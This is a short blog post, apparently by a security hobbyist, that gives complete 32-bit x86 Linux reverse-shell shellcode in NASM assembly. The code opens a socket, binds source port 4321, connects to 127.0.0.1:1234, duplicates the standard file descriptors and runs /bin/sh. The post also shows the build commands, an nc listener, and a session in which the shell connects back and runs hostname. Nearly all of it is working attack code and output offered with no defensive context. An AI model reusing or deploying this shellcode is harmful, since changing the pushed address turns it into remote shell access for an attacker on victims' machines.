# cat blog >> /dev/brain 2> /proc/mind
cat blog >> /dev/brain 2> /proc/mind
SERVER# cat sc.asm BITS 32 section .txt global _start _start: ; sockfd=socket(AF_INET,SOCK_STREAM,0) ; sockfd=socket(2,1,0) push byte 0x66 ; socketcall number (102) pop eax cdq ; xor edx,edx xor ebx,ebx inc ebx ; ebx=0x00000001 (socket) push edx ; edx=0x00000000 push byte 0x01 push byte 0x02 mov ecx,esp int 0x80 ; system call xchg esi,eax ; bind(sockfd,(struct sockaddr *)&sin,sizeof(struct sockaddr_in)) ; bind(sockfd,[2,4321,0],16) push byte 0x66 ; socketcall number (102) pop eax inc ebx ; ebx=0x00000002 (bind) push edx ; edx=0x00000000 (Any available source IP) push word 0xe110 ; source port = 4321 push word bx ; 0x0002 mov ecx,esp push byte 0x10 ; 16 push ecx push esi mov ecx,esp int 0x80 ; system call ; connect(sockfd,(struct sockaddr *)&sin,sizeof(struct sockaddr_in)) ; connect(sockfd,[2,1234,127.0.0.1],16) push byte 0x66 ; socketcall number (102) pop eax push dword 0x01bbbb7f ; 127.187.187.1 xor ecx,ecx mov word [esp+1],cx ; destination ip = 127.0.0.1 push word 0xd204 ; destination port = 1234 push word bx ; 0x0002 mov ecx,esp push byte 0x10 ; 16 push ecx push esi mov ecx,esp inc ebx ; ebx=0x00000003 (connect) int 0x80 ; system call xchg ebx,esi ; dup2(cfd,i) push byte 0x2 pop ecx dup_loop: mov byte al,0x3f ; dup2 number (63) int 0x80 ; system call dec ecx jns dup_loop ; execve("/bin/sh",shell,NULL) xor eax,eax mov byte al,11 ; system call number push edx ; \0 push long 0x68732f2f ; hs// push long 0x6e69622f ; nib/ mov ebx,esp ; first parameter push edx mov edx,esp ; third parameter push ebx mov ecx,esp ; second parameter int 0x80 ; system call SERVER# nasm -f elf sc.asm && ld -o sc sc.o CLIENT# nc -lv 127.0.0.1 1234 SERVER# ./sc Connection from [127.0.0.1] port 1234 [tcp/*] accepted (family 2, sport 4321) hostname SERVER exit CLIENT#
cat sc.asm
nasm -f elf sc.asm && ld -o sc sc.o
nc -lv 127.0.0.1 1234
./sc
hostname
exit
Post a Comment
No comments:
Post a Comment